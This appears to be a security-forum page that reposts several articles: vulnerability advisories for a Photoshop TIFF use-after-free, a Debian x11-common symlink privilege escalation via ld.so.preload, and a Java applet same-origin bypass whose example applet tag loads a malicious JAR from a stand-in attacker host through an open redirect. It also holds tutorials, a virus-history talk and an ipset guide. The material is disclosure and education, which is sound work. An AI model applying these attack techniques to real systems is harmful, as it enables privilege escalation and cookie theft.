In 2008, Adobe released Adobe Photoshop Express, a free web-based image editing tool to edit photos directly on blogs and social networking sites; in 2011 a version was released for the Android operating system and the iOS operating system.[7][8] Adobe only supports Windows and Macintosh versions of Photoshop, but using Wine, Photoshop CS5 can run well on Linux (http://en.wikipedia.org/wiki/Adobe_Photoshop)
#####################################################################################
============================
2) Report Timeline
============================
2011-09-20 Vulnerability reported to Adobe
2012-03-20 Publication of this advisory (180 days after reporting to the vendor)
#####################################################################################
============================
3) Technical details
============================
The vulnerability is caused by an error when processing the TIFF image file format, which can be exploited to trigger a use-after-free by, e.g., tricking a user into opening a specially crafted file.
#####################################################################################
===========
4) POC
===========
http://www.protekresearchlab.com/exploits/PRL-2012-07.tif
http://www.exploit-db.com/sploits/18633.tif
Sursa: Adobe Photoshop 12.1 Tiff Parsing Use-After-Free
15. [h=2]Locating Domain Controllers[/h] So I just set up a mini enterprise environment with a domain controller (tip: win2k8r2 can be used free for 180 days) and a client. I decided to run Wireshark while I added the client to the new domain, which resulted in the following screenshot: Now that looks rather interesting when you want to locate domain controllers, doesn’t it? Let’s give it a go with nslookup:
[INDENT]C:\>nslookup -type=SRV _ldap._tcp.dc._msdcs.pen.test
Server: UnKnown
Address: 192.168.164.128

_ldap._tcp.dc._msdcs.pen.test SRV service location:
priority = 0
weight = 100
port = 389
svr hostname = win-62u3ql0g1ia.pen.test
win-62u3ql0g1ia.pen.test internet address = 192.168.164.128
win-62u3ql0g1ia.pen.test internet address = 192.168.126.133
[/INDENT]
Now isn’t that neat? It’s a quick and easy way to find the available domain controllers in a network, if you know the domain name. Additionally, it seems that the client communicates with the domain controller using CLDAP. I didn’t find a suitable Linux client, but in the links below you’ll find a perl script capable of performing the so-called “LDAP Ping”; the other option is of course using a Windows client. The output of the script is similar to the one shown in Wireshark, which looks as follows: Now I can’t be the only one doing this, so I googled around a bit and found some nice additional material worth the read, summed up below:
http://support.microsoft.com/kb/24781
ftp://pserver.samba.org/pub/unpacked/samba_3_waf/examples/misc/cldap.pl
http://msdn.microsoft.com/en-us/library/cc223799(v=prot.10).aspx
MS-CLDAP - The Wireshark Wiki
SRV Resource Records
Sursa: Locating Domain Controllers
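On Linux, the same SRV lookup can be reproduced with standard DNS tools. A small sketch, assuming only the standard _ldap._tcp.dc._msdcs.&lt;domain&gt; DC-locator naming convention (the helper function name and lab domain are mine):

```shell
# Build the DNS name of the SRV record that advertises domain controllers
# for a given AD domain. "pen.test" matches the article's lab domain.
dc_srv_name() {
    # DC locator records live under _ldap._tcp.dc._msdcs.<domain>
    echo "_ldap._tcp.dc._msdcs.$1"
}

dc_srv_name "pen.test"
# prints: _ldap._tcp.dc._msdcs.pen.test
# On a Linux box, dig performs the same lookup nslookup did on Windows:
#   dig +short SRV "$(dc_srv_name pen.test)" @192.168.164.128
```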
  16. Portable Executable File Format – A Reverse Engineer View Goppit January 2006 Abstract This tutorial aims to collate information from a variety of sources and present it in a way which is accessible to beginners. Although detailed in parts, it is oriented towards reverse code engineering and superfluous information has been omitted. Download: http://ivanlef0u.fr/repo/windoz/pe/CBM_1_2_2006_Goppit_PE_Format_Reverse_Engineer_View.pdf
  17. Signing Me onto Your Accounts through Facebook and Google: a Traffic-Guided Security Study of Commercially Deployed Single-Sign-On Web Services Rui Wang Indiana University Bloomington Bloomington, IN, USA wang63 @indiana.edu Shuo Chen Microsoft Research Redmond, WA, USA shuochen @microsoft.com XiaoFeng Wang Indiana University Bloomington Bloomington, IN, USA xw7 @indiana.edu Abstract— With the boom of software-as-a-service and social networking, web-based single sign-on (SSO) schemes are being deployed by more and more commercial websites to safeguard many web resources. Despite prior research in formal verification, little has been done to analyze the security quality of SSO schemes that are commercially deployed in the real world. Such an analysis faces unique technical challenges, including lack of access to well-documented protocols and code, and the complexity brought in by the rich browser elements (script, Flash, etc.). In this paper, we report the first “field study” on popular web SSO systems. In every studied case, we focused on the actual web traffic going through the browser, and used an algorithm to recover important semantic information and identify potential exploit opportunities. Such opportunities guided us to the discoveries of real flaws. In this study, we discovered 8 serious logic flaws in high-profile ID providers and relying party websites, such as OpenID (including Google ID and PayPal Access), Facebook, JanRain, Freelancer, FarmVille, Sears.com, etc. Every flaw allows an attacker to sign in as the victim user. We reported our findings to affected companies, and received their acknowledgements in various ways. All the reported flaws, except those discovered very recently, have been fixed. This study shows that the overall security quality of SSO deployments seems worrisome. 
We hope that the SSO community conducts a study similar to ours, but on a larger scale, to better understand to what extent SSO is insecurely deployed and how to respond to the situation. Keywords— Single-Sign-On Download: http://research.microsoft.com/pubs/160659/websso-final.pdf
18. [h=2]Debian's x11-common init script weakness (CVE-2012-1093)[/h] The init script shipped in the x11-common Debian package is vulnerable to a traditional symlink attack that can lead to a privilege escalation while the package is being installed. This bug isn't very critical (except if you install x11-common for the very first time on a multi-user system), but I wanted to leave a note about it because the vulnerable code is quite common and could be found in your own scripts. The code creates two temporary directories ($SOCKET_DIR and $ICE_DIR) in the following manner:
$ cat -n /etc/init.d/x11-common
[...]
11 set -e
[...]
33 if [ -e $SOCKET_DIR ] && [ ! -d $SOCKET_DIR ]; then
34   mv $SOCKET_DIR $SOCKET_DIR.$$
35 fi
36 mkdir -p $SOCKET_DIR
37 chown root:root $SOCKET_DIR
38 chmod 1777 $SOCKET_DIR
A symlink attack looks impossible here, as the script uses the "set -e" built-in command (the script aborts immediately when a command returns a non-zero status). I mean, if $SOCKET_DIR is a symlink, we could think that the "mkdir -p" command at line 36 would fail (at least, this behavior was expected by the developers). But this is wrong: "mkdir" with the "-p" option returns zero if the target already exists:
$ man mkdir
[...]
-p, --parents no error if existing, make parent directories as needed
So the only thing needed to exploit this is to place a link that doesn't match the condition at line 33 (i.e. a symlink that points to an existing directory), and wait for the package to be installed. In this case, a symlink to the "/etc" directory would allow the user to set the 1777 permission on this directory and create the "/etc/ld.so.preload" file in order to load malicious libraries into a set-uid process. x11-common root exploit PoC I reported this bug, and it was fixed with a very nice patch from jcristau in version 1:7.6+12 of the x11-common package. Thanks to him. Debian bug report #661627 Sursa: Security
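The mkdir -p behavior at the heart of the bug is easy to demonstrate safely in a throwaway directory (a sketch; all paths here are scratch names of mine, not the init script's):

```shell
# Reproduce the "mkdir -p" pitfall: with a symlink pointing at an existing
# directory, mkdir -p exits 0 even under "set -e", and the following chmod
# lands on the symlink's target.
set -e
tmp=$(mktemp -d)
mkdir "$tmp/realdir"
ln -s "$tmp/realdir" "$tmp/socketdir"   # attacker-planted symlink
mkdir -p "$tmp/socketdir"               # no error: target already "exists"
chmod 1777 "$tmp/socketdir"             # follows the link...
stat -c %a "$tmp/realdir"               # ...so realdir is now mode 1777
# prints: 1777
rm -rf "$tmp"
```

Swap realdir for /etc and the 1777 becomes the privilege-escalation primitive the post describes.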
19. Exclusive - Source Code Spoofing with HTML5 and the LTO Character Article written by John Kurlak for The Hacker News. He is a senior studying Computer Science at Virginia Tech. Today John will teach us how to spoof the source code of a web page. For example, open the page and try to view its source code ;-) Can you? About eight months ago, I learned about HTML5’s new JavaScript feature, history.replaceState(). The history.replaceState() function allows a site developer to modify the URL of the current history entry without refreshing the page. For example, I could use the history.replaceState() function to change the URL of my page in the address bar from “http://www.kurlak.com/example.html” to “http://www.kurlak.com/example2.html” When I first learned of the history.replaceState() function, I was both skeptical and curious. First, I wanted to see if history.replaceState() supported changing the entire URL of a page, including the hostname. Fortunately, the developers were smart enough to prevent that kind of action. Next, I noticed that if I viewed the source code of a page after replacing the URL, it attempted to show the source code of the new page. I started brainstorming ways I could make the URL look the same but have a different underlying representation. Such a scenario would make it so that I could “hide” the source code of a page by masking it with another page. I remembered encountering a special Unicode character some time back that reversed all text that came after it. That character is called the “right to left override” (RTO) and can be produced with decimal code 8238. I tried to create an HTML page, “source.html,” that would use history.replaceState() to replace the URL of the page with: [RTO] + “lmth.ecruos” (the reversed text of “source.html”). When the browser rendered the new URL, the RTO character reversed the letters after it, making the browser display “source.html” in the address bar.
However, when I went to view the source of the web page, my browser tried to view the source of “&#8238;lmth.ecruos” instead (the characters, “&#8238;,” are the ASCII representation of the hex codes used to represent the RTO character). Thus, I created a page, “&#8238;lmth.ecruos” and put some “fake” source code inside. Now, when I went to “source.html,” the URL was replaced with one that rendered the same, and when I viewed the source of the page, it showed my “fake” source code. The code I used for “source.html” was: However, there was a downfall: if the user tried to type after the RTO character in the address bar, his or her text would show up backwards, a clear indication that something strange was going on. I brainstormed additional solutions. I soon found that there was also a “left to right override” (LTO) character. I discovered that placing the LTO character within text that is already oriented left to right does not do anything. I decided to add the LTO character to the end of my URL and used the following code: Then, I simply had to create “source.html&#8237;” and put my “fake” source code in it. It worked! Now the user could type normally without seeing anything funny. However, this new code still has two downfalls. The first downfall is that the script appears to work only for Google Chrome (I tested the script in Chrome 17.0.963.79 m). Firefox 11 escapes the RTO character, so the user sees “%E2%80%AElmth.ecruos” in the URL bar instead of “source.html.” (I have had reports, however, that the “exploit” works in Firefox 11 on Linux. I have not yet confirmed those reports). Internet Explorer 9 does not yet support history.replaceState(), but apparently Internet Explorer 10 will. Opera 11 and Safari 5 both show “source.html” in the address bar, but when I go to view the page source, both browsers bring up the code for the original “source.html.” The second downfall is that if the user tries to refresh the page, he or she will be taken to the fake HTML page.
As far as I know, there is no sure way to prevent this side effect. Finally, I would like to point out that this “exploit” is just a cool trick. It cannot be used to prevent someone from retrieving the source code of a web page. If a browser can access a page’s source code, a human can access that page’s source code. Maybe someone else can think of a more interesting use of the trick. I hope you like it! You can download both sample files Here Submitted By : John Kurlak Website: http://www.kurlak.com Sursa: Exclusive - Source Code Spoofing with HTML5 and the LTO Character | The Hacker News (THN)
  20. [h=2]Java Applet Same-Origin Policy Bypass via HTTP Redirect[/h] [h=3]Summary[/h] Java 1.7 and Java 1.6 Update 27 and below do not properly enforce the same-origin policy for applets which are loaded via URLs that redirect. A malicious user can take advantage of this flaw to attack websites which redirect to third party content. This issue was patched in both Java 7 and Java 6 as part of the October 2011 Critical Patch Update. This issue has been assigned CVE-2011-3546. [h=3]What is the same-origin policy[/h] From Wikipedia: In computing, the same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript. The policy permits scripts running on pages originating from the same site to access each other’s methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites. The origin for a Java applet is the hostname of the website where the applet is served from. So, for example, if I upload an applet to http://example.com/applet.jar, that applet’s origin is example.com. We care about the origin for security reasons: the same-origin policy ensures that an applet is only allowed to make HTTP requests back to the domain from which it originates (or to another domain which resolves to the same IP address, but we can ignore that behavior here). [h=3]So, where’s the security vulnerability?[/h] Under certain conditions, the JRE did not correctly determine the origin of an applet. Specifically, when loading an applet via a URL that performed an HTTP redirect, the Java plugin used the original source of the redirect, not the final destination, as the applet’s origin. If you’re confused, an example might help to illustrate things. Lets first start by imagining a website, example.com, that contains an open redirect. 
In other words, imagine that browsing to the open-redirect URL on example.com redirects the user to http://www.google.com using a 301 or 302 redirect. Now, let's consider an attacker who controls the domain evildomain.com. This is what the attacker does:
Writes a malicious Java applet that accesses http://example.com
Uploads that applet to http://evildomain.com/evil.jar
Constructs a redirect from http://example.com to the malicious applet (http://example.com/redirect.php?url=http://evildomain.com/evil.jar)
Creates a malicious page anywhere on the Internet containing the following HTML:
<applet code="CSRFApplet.class" archive="http://example.com/redirect.php?url=http://evildomain.com/evil.jar" width="300" height="300"></applet>
So what happens when a user visits that page? Well, let's first think about what we would want to happen:
The user loads the page.
The user's browser fetches the Java applet.
The Java applet executes.
The Java applet tries to access http://example.com but fails, because the applet was served up by http://evildomain.com, violating the same-origin policy.
Now, here's what actually happened:
The user loads the page.
The user's browser fetches the Java applet.
The Java applet executes.
The Java applet tries to access http://example.com AND SUCCEEDS !!!
That behavior is dangerous for websites that redirect to third party content: since HTTP requests made via Java applets inherit a user's cookies from the browser (minus those marked as HttpOnly), an attacker who exploits this vulnerability is able to steal sensitive information or perform a CSRF attack against a targeted website. Any users who have not upgraded to the latest version of Java are vulnerable to attack. [h=3]How to protect your website[/h] Java applets are client-side technology, but this vulnerability has a very real impact on website owners.
Aside from waiting for your users to upgrade to the latest version of Java, here are some steps you can take to protect your site: [h=4]1. Block requests containing Java’s user-agent from accessing your redirects[/h] This solution is fairly simple. By denying requests made by Java applets to redirect scripts on your site, you can prevent a malicious applet from being loaded. The UAs you’ll want to block contain the string “Java/” (without the quotation marks). [Note: Blocking that string may be overly broad: I haven't researched whether other software claims to be Java. I'll update this post if I'm made aware of any conflicts.] [h=4]2. Use HttpOnly cookies[/h] Java is not able to read or make requests with cookies that are marked HttpOnly. As a result, this attack can not be used to access or make requests to the authenticated portion of any site that uses HttpOnly cookies. [h=4]3. Don’t redirect to third party content[/h] Open redirects are considered to be problematic for a number of reasons (including their use in phishing attacks). If at all possible, you should avoid them entirely, or heavily restrict the locations that they can redirect to. [h=3]Disclosure Timeline[/h] December 28th, 2010: Vulnerability discovered January 10th, 2011: Built two proofs of concept involving major websites (will not be disclosed publicly) January 11th, 2011: Email sent to vendor. 
Disclosed full details of vulnerability, including proofs of concept January 12th, 2011: Vendor acknowledges receipt of email January 25th, 2011: Followup email sent to vendor, inquiring about status January 26th, 2011: Vendor replies: issue is still being investigated February 15th, 2011: A Java SE Critical Patch Update is released March 15th, 2011: Followup email sent to vendor, inquiring about status March 18th, 2011: Vendor replies: issue is still being investigated March 24th, 2011, 5:44 AM: Vendor sends automated status report email that fails to mention this vulnerability March 24th, 2011, 8:04 AM: Followup email sent to vendor, inquiring about status March 24th, 2011, 4:44 PM: Vendor acknowledges vulnerability, plans to address in a future update April 25th, 2011: Vendor sends automated status report email that fails to mention this vulnerability May 23rd, 2011, 9:44 AM: Followup email sent to vendor inquiring about the status of a fix May 23rd, 2011, 2:24 PM: Vendor replies: plans to address vulnerability in October 2011 Java Critical Patch Update May 24th, 2011: Vendor sends automated status report email that fails to mention this vulnerability June 7th, 2011: A Java SE Critical Patch Update is released June 23rd, 2011: Vendor sends automated status report email that fails to mention this vulnerability July 22nd, 2011, 5:24 AM: Vendor sends automated status report email that fails to mention this vulnerability July 22nd, 2011, 8:04 AM: Followup email sent to vendor, inquiring about status July 22nd, 2011, 1:33 PM: Vendor replies, apologizes for not including vulnerability in status report. Reiterates that a fix for the vulnerability is targeted for the October 2011 Java Critical Patch Update July 28th, 2011: Java 7 is released. Testing reveals the vulnerability has not been patched. Email with vendor confirms. August 23rd, 2011: Vendor sends automated status report email. 
Vulnerability is now included and is marked “Issue fixed in main codeline, scheduled for a future CPU” September 23rd, 2011: Vendor sends automated status report email. Vulnerability is marked “Issue fixed in main codeline, scheduled for a future CPU” October 14th, 2011: Vendor sends out email confirming that vulnerability will be patched in CPU to be released on October 18th. October 18th, 2011: Java 6 Update 29 and Java 7 Update 1 are released, patching the vulnerability. [h=3]Anything else?[/h] It appears Firefox was vulnerable to a similar attack back in 2007: The blogger at beford.org noted that redirects confused Mozilla browsers about the true source of the jar: content: the content was wrongly considered to originate with the redirecting site rather than the actual source. This meant that an XSS attack could be mounted against any site with an open redirect even if it didn’t allow uploads. A published proof-of-concept demonstrates stealing the GMail contact list of users logged-in to GMail. It also appears that people have been aware of similar attacks against Java for a while now. I stumbled across a post on http://sla.ckers.org/ that mentioned using redirects to JARs as a way to steal cookies. I believe the “fix” referred to in the post (which only covers cookie stealing) was made in response to this vulnerability from 2010. If you have any questions about the vulnerability, please feel free to leave them in the comments! Sursa: https://nealpoole.com/blog/2011/10/java-applet-same-origin-policy-bypass-via-http-redirect/
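Mitigation #1 above (denying the "Java/" user-agent access to redirect scripts) could be sketched, for an Apache 2.2-era setup, roughly as follows. The location path and environment-variable name are placeholders of mine, not from the post, and the "Java/" pattern may be overly broad, as the author notes, so test before deploying:

```apache
# Keep Java applets from fetching JARs through our open redirect by
# denying any client whose User-Agent contains "Java/".
<Location "/redirect.php">
    SetEnvIfNoCase User-Agent "Java/" java_client
    Order Allow,Deny
    Allow from all
    Deny from env=java_client
</Location>
```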
21. Penetration testing business From: Krzysztof Marczyk <krzysztof.marczyk () software com pl> Date: Tue, 20 Mar 2012 17:08:47 +0100 PenTest Magazine has released the first issue of PenTest Market, the *ONE AND ONLY* magazine about the penetration testing business! PenTest Market 01/2012 | Issues | PenTest Magazine If you:
- are an IT Security-related company owner
- are an IT professional looking for a job
- are planning on becoming an IT Security professional
- want to know the IT Security business from the inside
- are planning on starting your own IT Security company
- want to know what clients expect and demand from IT Security companies
...it means that this magazine is just for you! Don't wait, and see it in our brand new PenTest Market! PenTest Market 01/2012 | Issues | PenTest Magazine If you want to take part in the creation of this magazine or have any questions, please contact us at krzysztof.marczyk () software com pl We will respond asap. Sursa: Full Disclosure: Penetration testing business
22. [h=1]The History and the Evolution of Computer Viruses: 1986-1991 [/h] Posted by david b. on March 19, 2012 F-Secure CRO Mikko Hypponen provides a captivating insight into the onset and advancement of computer infections in his talk at Defcon 19 called “The History and the Evolution of Computer Viruses”. This part of the speech is dedicated to a detailed description of the first viruses that came on stage in 1986 – 1991, such as the ‘Brain’, ‘Omega’ and others. My name is Mikko Hypponen, and we’ll be doing the first session here talking about the history and evolution of computer viruses. I am from Finland. I’ve been playing around with viruses for the past 20 years, a little bit more than that. And we are at an interesting point in history, and I’ll get back to that in just a moment, and that’s the main reason why I wanted to speak about the whole evolution of where we’ve been, where we are right now, and where we will be going with malware, trojans, backdoors, worms, viruses. Now, all those years I’ve been working with the same company – F-Secure. So, we run antivirus labs around the world. And of course in the early days our operations were very small. A couple of guys in the lab analyzed everything by hand, reverse-engineered the code, built detection, tried to figure out how they spread. Today, all professional antivirus companies run massive labs around the world with automation, because we are, on a typical day right now, receiving somewhere in the range of 100,000 to 200,000 samples coming into our systems. So, obviously we can’t keep up with normal human power any more. [h=3]1986 – 1991[/h] But we’ll start from ‘Brain’. So, what you’re seeing on the image here is an original 5.25-inch floppy disk infected by ‘Brain’. Last year, around November, we were cleaning our labs and in one of the cupboards, we found this box which was full of 5.25-inch floppy disks. And that box had basically the first 100 PC viruses in it, including this ‘Brain.A’.
And ‘Brain.A’ is considered to be – and is known to be – the first PC virus in history. That’s the first PC virus. We’ve seen before 1986, for example, some Apple II viruses and stuff like that. But this is actually important because we are still finding PC viruses today, right? So, I did the math, 1986 – 2011, that’s 25. It’s gonna be 25 years. And we had a meeting in the lab. Okay, what should we do about this? It’s gonna be 25 years since the first PC virus. And our media team thought that we should have some sort of social media campaign to raise awareness of computer security. And I thought that that’s boring, what about if I try to go and find the guys who wrote ‘Brain’ 25 years ago. And if I find them, I’ll speak with them, and I ask them, like, you know, why did you do it, what were you thinking, and what do you think about what you started 25 years ago. It’s gonna be 25 years since the first PC virus. And actually, doing that – like trying to find virus authors 25 years later – typically would be impossible. In case of ‘Brain’, it actually isn’t, and I’ll show you. Here is the actual boot code of a floppy infected by ‘Brain’. So, if you just take a closer look, you’ll see some text inside here (see image) saying ‘Welcome to the Dungeon, 1986, Basit and Amjad’, and Basit and Amjad are first names. They are Pakistani first names. Then there is a phone number and a street address. So, in February, I went to the town of Lahore in Pakistan, which was the address listed inside the ‘Brain’ code. So I knocked on the door. You wanna guess who was at the door? Basit and Amjad. They are still there. Nowadays these guys run an Internet operator, and it is a telco operator for the city of Lahore, and the company is called ‘Brain Telecommunications’. So, we had a very interesting chat about, okay, why did you do it, and what were you thinking, and…Their explanation was that it was a proof of concept. These guys had a background in Unix1 world. 
They had been running different mainframe systems in the early 1980s, when they were like in their late teens – early 20s. And then PC DOS2 came around, in 1985. And they hated it. They thought that it wasn’t secure – and obviously, it wasn’t. And they decided to prove it by writing a virus. And that’s what they did. And of course they had no idea that virus would go around the world, infect computers in more than 100 countries around the world, but that’s what it did. They also started getting phone calls from around the world, from people who had been infected by the virus and all that. They really weren’t expecting that to happen, but of course it went global, became a global problem. 1986 – Brain 1987 – Stoned 1987 – Cascade 1989 – Yankee Doodle 1989 – Dark Avenger 1990 – Form ‘Brain’ was a very typical example of the early viruses we used to see back then. The motive wasn’t anything very concrete. These guys wanted to try something out. They wanted to do something that would replicate and go around the world. And of course, around those days (1986, 1987, 1988) viruses like ‘Brain’ and ‘Stoned’ and ‘Cascade’, and ‘Yankee Doodle’ were all basically the same thing. They were spreading on floppy disks, infecting boot sectors, so you would have infected floppy inside your computer, you boot from the floppy – you get infected, and every other floppy you put in after that gets infected as well. Or file infectors like ‘Yankee Doodle’ which would infect DOS .COM files, and then when you share files, well, it spreads from one computer to another. What we have to remember is that in 1986 we didn’t have networks. I mean normal computers, PC computers, were not connected to each other in any way. In fact, most computers didn’t have a hard drive. They would typically have two floppy drives only, right. So, if you wanted to move data around you had to put it on a floppy, there were no other means of doing it. And that’s why floppy-based infectors spread so quickly. 
In 1986 computers were not connected to each other and most of them didn’t have hard drives, so floppy-based infectors spread quickly. Many of these viruses at that time were also, in one way or another, visual. What I mean by that is that you would typically know that you are infected. And one good example of that is the ‘Omega’ virus. This one is not so important or pointed in any history books or anywhere actually, to anyone else except to me. But it’s important to me because it’s the first virus I analyzed. In September 1991, we had a customer case of a large company, actually a telco, where they had damage on their computers and they were suspecting a virus, and they sent us a sample. And I got assigned to look at the sample, because around that time in F-Secure, I was the only guy who would do reverse-engineering in assembly language. Even though I actually had never done it on a PC, I had background with Commodore 643 and doing assembly there, but, you know, I decided to do that. And I printed out the code, spent a couple of days trying to go through and understand how it works, and learning the interrupts of DOS system and all that. And I did it, I decoded it. I actually didn’t have a spare PC I could infect at that time, so I actually couldn’t run the code, I was just reading it, trying to figure out what it does. And one of the things that I thought it did, just looking at the code, was that on the 13th of the month, if it was a Friday, it would activate and display one character: character number 232, I believe. And I looked up that character and that is the ‘Omega’ sign. So, I named the virus ‘Omega’. That’s the first virus I ever named. And the name stuck, if you google around, you will still find this virus as the ‘Omega’ virus. And that actually started a tradition. Nowadays, in our company, once you’ve been 10 years with the company, you’ll get a genuine Swiss OMEGA watch. So, I should have named the virus ‘Ferrari’.
To be continued… 1 – Unix is a term generally used to refer to those multitasking, multi-user operating systems which use this term as the entirety of or as part of their official names, including all of the original versions of UNIX that were developed at Bell Labs. 2 – PC DOS (full name: The IBM Personal Computer Disk Operating System) is a DOS system for the IBM Personal Computer and compatibles, manufactured and sold by IBM from the 1980s to the 2000s. 3 – Commodore 64 was an 8-bit home computer manufactured by the now defunct Commodore International company in the time frame 1982-1994. Sursa: The History and the Evolution of Computer Viruses: 1986-1991 | Privacy PC
23. I have added 3 new sub-categories to the "Blackhat SEO si monetizare" (Blackhat SEO and monetization) category.
24. [h=3]Build Your Own Ubuntu based GNU/Linux Distribution - Ubuntu Builder[/h] Posted by Nikesh Jauhari Ubuntu Builder is a simple tool to build your own distribution. It allows you to download, extract, customize in many ways, and rebuild your Ubuntu images. You can customize i386 and amd64 images. Ubuntu Builder Installation: You can install Ubuntu Builder by downloading the latest version package (here) and installing it using Ubuntu Software Center by double-clicking on the deb file. After successful installation, you can open Ubuntu Builder from the Unity 'Dash'. Clicking on 'Select ISO' will open an input box that will allow you to select the ISO image to be extracted for customization. You can select an ISO image from your local system, or download Ubuntu Mini Remix, which offers an ISO image with minimal packages for customization. To do that, click 'Get Ubuntu', choose the release and location, and click Download. Sursa: Build Your Own Ubuntu based GNU/Linux Distribution - Ubuntu Builder | Linux Poison
  25. [h=1]Advanced Firewall Configurations with ipset[/h]
Mar 19, 2012 By Henry Van Styn

iptables is the user-space tool for configuring firewall rules in the Linux kernel. It is actually a part of the larger netfilter framework. Perhaps because iptables is the most visible part of the netfilter framework, the framework is commonly referred to collectively as iptables. iptables has been the Linux firewall solution since the 2.4 kernel.

ipset is an extension to iptables that allows you to create firewall rules that match entire "sets" of addresses at once. Unlike normal iptables chains, which are stored and traversed linearly, IP sets are stored in indexed data structures, making lookups very efficient, even when dealing with large sets.

Besides the obvious situations where you might imagine this would be useful, such as blocking long lists of "bad" hosts without worry of killing system resources or causing network congestion, IP sets also open up new ways of approaching certain aspects of firewall design and simplify many configuration scenarios.

In this article, after quickly discussing ipset's installation requirements, I spend a bit of time on iptables' core fundamentals and concepts. Then, I cover ipset usage and syntax and show how it integrates with iptables to accomplish various configurations. Finally, I provide some detailed and fairly advanced real-world examples of how ipsets can be used to solve all sorts of problems.

With significant performance gains and powerful extra features—like the ability to apply single firewall rules to entire groups of hosts and networks at once—ipset may be iptables' perfect match. Because ipset is just an extension to iptables, this article is as much about iptables as it is about ipset, although the focus is on those features relevant to understanding and using ipset. 
[h=3]Getting ipset[/h]
ipset is a simple package option in many distributions, and since plenty of other installation resources are available, I don't spend a whole lot of time on that here. The important thing to understand is that like iptables, ipset consists of both a user-space tool and a kernel module, so you need both for it to work properly. You also need an "ipset-aware" iptables binary to be able to add rules that match against sets.

Start by simply doing a search for "ipset" in your distribution's package management tool. There is a good chance you'll be able to find an easy procedure to install ipset in a turn-key way. In Ubuntu (and probably Debian), install the ipset and xtables-addons-source packages. Then, run module-assistant auto-install xtables-addons, and ipset is ready to go in less than 30 seconds.

If your distro doesn't have built-in support, follow the manual installation procedure listed on the ipset home page (see Resources) to build from source and patch your kernel and iptables. The versions used in this article are ipset v4.3 and iptables v1.4.9.

[h=3]iptables Overview[/h]
In a nutshell, an iptables firewall configuration consists of a set of built-in "chains" (grouped into four "tables") that each comprise a list of "rules". For every packet, and at each stage of processing, the kernel consults the appropriate chain to determine the fate of the packet. Chains are consulted in order, based on the "direction" of the packet (remote-to-local, remote-to-remote or local-to-remote) and its current "stage" of processing (before or after "routing"). See Figure 1.

Figure 1. iptables Built-in Chains Traversal Order

When consulting a chain, the packet is compared to each and every one of the chain's rules, in order, until it matches a rule. Once the first match is found, the action specified in the rule's target is taken. If the end of the chain is reached without finding a match, the action of the chain's default target, or policy, is taken. 
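A rule, then, is just a match plus a target, installed at a given position in a given chain. As a dry-run sketch of that anatomy (the command is printed, not executed, so no root privileges or netfilter support are needed; the rule shown is an illustrative one that accepts inbound TCP traffic to port 80):

```shell
# The three basic parts of every iptables command:
TABLE_CHAIN='-t filter -A INPUT'   # which table/chain, and where in the chain
MATCH='-p tcp --dport 80'          # match: TCP destination port 80
TARGET='-j ACCEPT'                 # target: accept the packet

# Assemble and print the full command (run it as root to apply it).
echo "iptables $TABLE_CHAIN $MATCH $TARGET"
```

Note that `-t filter` is usually omitted in practice, since filter is the default table when none is specified.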
A chain is nothing more than an ordered list of rules, and a rule is nothing more than a match/target combination. A simple example of a match is "TCP destination port 80". A simple example of a target is "accept the packet". Targets also can redirect to other user-defined chains, which provide a mechanism for the grouping and subdividing of rules, and cascading through multiple matches and chains to arrive finally at an action to be taken on the packet.

Every iptables command for defining rules, from the very short to the very long, is composed of three basic parts that specify the table/chain (and order), the match and the target (Figure 2).

Figure 2. Anatomy of an iptables Command

To configure all these options and create a complete firewall configuration, you run a series of iptables commands in a specific order. iptables is incredibly powerful and extensible. Besides its many built-in features, iptables also provides an API for custom "match extensions" (modules for classifying packets) and "target extensions" (modules for what actions to take when packets match).

[h=3]Enter ipset[/h]
ipset is a "match extension" for iptables. To use it, you create and populate uniquely named "sets" using the ipset command-line tool, and then separately reference those sets in the match specification of one or more iptables rules. A set is simply a list of addresses stored efficiently for fast lookup.

Take the following normal iptables commands that would block inbound traffic from 1.1.1.1 and 2.2.2.2:

iptables -A INPUT -s 1.1.1.1 -j DROP
iptables -A INPUT -s 2.2.2.2 -j DROP

The match specification syntax -s 1.1.1.1 above means "match packets whose source address is 1.1.1.1". To block both 1.1.1.1 and 2.2.2.2, two separate iptables rules with two separate match specifications (one for 1.1.1.1 and one for 2.2.2.2) are defined above. 
Alternatively, the following ipset/iptables commands achieve the same result:

ipset -N myset iphash
ipset -A myset 1.1.1.1
ipset -A myset 2.2.2.2
iptables -A INPUT -m set --set myset src -j DROP

The ipset commands above create a new set (myset of type iphash) with two addresses (1.1.1.1 and 2.2.2.2). The iptables command then references the set with the match specification -m set --set myset src, which means "match packets whose source header matches (that is, is contained within) the set named myset". The flag src means match on "source". The flag dst would match on "destination", and the flag src,dst would match on both source and destination.

In the second version above, only one iptables command is required, regardless of how many additional IP addresses are contained within the set. Although this example uses only two addresses, you could just as easily define 1,000 addresses, and the ipset-based config still would require only a single iptables rule, while the previous approach, without the benefit of ipset, would require 1,000 iptables rules.

[h=3]Set Types[/h]
Each set is of a specific type, which defines what kind of values can be stored in it (IP addresses, networks, ports and so on) as well as how packets are matched (that is, what part of the packet should be checked and how it's compared to the set). Besides the most common set types, which check the IP address, additional set types are available that check the port, the IP address and port together, MAC address and IP address together and so on.

Each set type has its own rules for the type, range and distribution of values it can contain. Different set types also use different types of indexes and are optimized for different scenarios. The best/most efficient set type depends on the situation. The most flexible set types are iphash, which stores lists of arbitrary IP addresses, and nethash, which stores lists of arbitrary networks (IP/mask) of varied sizes. 
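The scaling point above (one iptables rule no matter how many entries the set holds) follows from the fact that populating a set is just a loop of ipset -A commands. A minimal sketch, with illustrative set name and addresses, that prints the commands rather than running them (pipe its output to sh as root to actually apply it, assuming the ipset v4 syntax used throughout this article):

```shell
# Emit one "ipset -A" command per address read from stdin.
populate_set() {
    set_name="$1"
    while read -r addr; do
        printf 'ipset -A %s %s\n' "$set_name" "$addr"
    done
}

# Two addresses here, but a 1,000-line file works just the same,
# and the single matching iptables rule never changes.
printf '1.1.1.1\n2.2.2.2\n' | populate_set myset
```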
Refer to the ipset man page for a listing and description of all the set types (there are 11 in total at the time of this writing). The special set type setlist also is available, which allows grouping several sets together into one. This is required if you want to have a single set that contains both single IP addresses and networks, for example.

[h=3]Advantages of ipset[/h]
Besides the performance gains, ipset also allows for more straightforward configurations in many scenarios. If you want to define a firewall condition that would match everything but packets from 1.1.1.1 or 2.2.2.2 and continue processing in mychain, notice that the following does not work:

iptables -A INPUT -s ! 1.1.1.1 -g mychain
iptables -A INPUT -s ! 2.2.2.2 -g mychain

